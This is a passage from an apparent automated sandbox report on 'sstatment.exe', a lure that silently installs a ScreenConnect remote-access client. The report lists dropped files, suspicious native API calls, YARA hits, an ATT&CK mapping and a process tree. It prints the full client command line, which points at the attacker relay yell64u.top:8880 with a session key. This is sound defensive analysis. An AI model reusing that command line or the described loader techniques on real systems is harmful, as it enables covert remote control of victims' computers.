Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 85C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: 95C0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Memory allocated: 1370000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Memory allocated: 14E0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Memory allocated: 34E0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: 1110000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: 1AE90000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: 16D0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: 1B170000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\sstatment.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.Cab.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Windows.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI367A.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Core.dll
Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI3417.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
Source: C:\Users\user\Desktop\sstatment.exe TID: 888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 7292 Thread sleep count: 48 > 30
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: ScreenConnect.ClientService.exe, 00000007.00000002.2974558303.0000000004A00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: setup.msi.0.dr Binary or memory string: VMCi-
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\sstatment.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\sstatment.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.sstatment.exe.5050000.0.raw.unpack, Program.cs Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.cs Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: C:\Users\user\Desktop\sstatment.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=php&c=&c=sales&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05351348 CreateNamedPipeW,7_2_05351348
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_01374D30 RtlGetVersion,7_2_01374D30
                              Source: C:\Users\user\Desktop\sstatment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
Source: Yara match | File source: sstatment.exe, type: SAMPLE
Source: Yara match | File source: 8.2.ScreenConnect.WindowsClient.exe.2f0fa20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sstatment.exe.54e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.ScreenConnect.WindowsClient.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sstatment.exe.54e0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.sstatment.exe.ac5db8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ScreenConnect.WindowsClient.exe.31efa60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.sstatment.exe.a163d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.sstatment.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1716168698.00000000054E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1703239568.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sstatment.exe PID: 4320, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 3332, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7424, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Installer\MSI3407.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match | File source: C:\Config.Msi\5e3177.rbs, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses after a technique is the count of matched signatures for that technique, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances, Gather Victim Org Information, Determine Physical Locations, Business Relationships, Identify Business Tempo
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts (1), Replication Through Removable Media (1), Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain, Compromise Hardware Supply Chain, Trusted Relationship, Hardware Additions
Execution: Windows Management Instrumentation (31), Native API (1), Command and Scripting Interpreter (12), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell, Unix Shell, Visual Basic, Python
Persistence: DLL Side-Loading (1), DLL Search Order Hijacking (1), Valid Accounts (1), Windows Service (2), Bootkit (1), RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Hypervisor
Privilege Escalation: DLL Side-Loading (1), DLL Search Order Hijacking (1), Valid Accounts (1), Access Token Manipulation (1), Windows Service (2), Process Injection (13), Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Process Injection
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1), DLL Search Order Hijacking (1), File Deletion (1), Masquerading (122), Valid Accounts (1), Access Token Manipulation (1), Virtualization/Sandbox Evasion (51), Process Injection (13), Hidden Users (1), Bootkit (1), Rundll32 (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Discovery: Peripheral Device Discovery (11), File and Directory Discovery (1), System Information Discovery (45), Security Software Discovery (21), Process Discovery (2), Virtualization/Sandbox Evasion (51), Remote System Discovery, System Owner/User Discovery, Network Sniffing, Network Service Discovery, System Network Connections Discovery, Process Discovery, Permission Groups Discovery, Local Groups, Domain Groups
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media, Component Object Model and Distributed COM, Exploitation of Remote Services
Collection: Archive Collected Data (11), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture, Email Collection, Local Email Collection, Remote Email Collection
Command and Control: Encrypted Channel (2), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (1), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS, Proxy, Internal Proxy, External Proxy
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol, Exfiltration Over Physical Medium, Exfiltration over USB, Commonly Used Port, Transfer Data to Cloud Account
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption, Resource Hijacking, Network Denial of Service, Direct Network Flood, Reflection Amplification
Behavior Graph (rendered as an image in the original report; ID: 1534362, Sample: sstatment.exe, Startdate: 15/10/2024, Architecture: WINDOWS, Score: 42). Recoverable content of the graph:

Top-level signatures: .NET source code contains potential unpacker; .NET source code references suspicious native API functions; Detected potential unwanted application; 3 other signatures
Network: yell64u.top, 85.239.34.190, 49731, 8880, RAINBOW-HKRainbownetworklimitedHK, Russian Federation (contacted by ScreenConnect.ClientService.exe)

Process tree:
- sstatment.exe: drops C:\Users\user\AppData\...\sstatment.exe.log (ASCII); signature: Contains functionality to hide user accounts; starts msiexec.exe
  - msiexec.exe: drops C:\Users\user\AppData\Local\...\MSI2C46.tmp (PE32)
- msiexec.exe: drops C:\...\ScreenConnect.WindowsClient.exe (PE32), C:\...\ScreenConnect.ClientService.exe (PE32), C:\...\ScreenConnect.WindowsClient.exe.config (XML) and 10 other files (none is malicious); signatures: Enables network access during safeboot for specific services, Modifies security policies related information; starts three msiexec.exe instances
  - msiexec.exe: starts rundll32.exe
    - rundll32.exe: drops C:\Users\user\...\ScreenConnect.Windows.dll (PE32), C:\...\ScreenConnect.InstallerActions.dll (PE32), C:\Users\user\...\ScreenConnect.Core.dll (PE32) and 4 other files (none is malicious); signature: Contains functionality to hide user accounts
- ScreenConnect.ClientService.exe: connects to yell64u.top; signatures: Reads the Security eventlog, Reads the System eventlog; starts two ScreenConnect.WindowsClient.exe instances
  - ScreenConnect.WindowsClient.exe: signatures: Creates files in the system32 config directory, Contains functionality to hide user accounts

Initial Sample: No Antivirus matches

Dropped Files:
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI2C46.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI3417.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI367A.tmp | 0% | ReversingLabs | |

Unpacked PE Files: No Antivirus matches

Domains: No Antivirus matches

URLs:
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Contacted Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
yell64u.top | 85.239.34.190 | true | true | | unknown

Contacted URLs:
Name | Source | Malicious | Antivirus Detection | Reputation
http://wixtoolset.org/releases/ | rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | unknown
http://wixtoolset.org/news/ | rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ScreenConnect.ClientService.exe, 00000007.00000002.2953487758.00000000016CA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
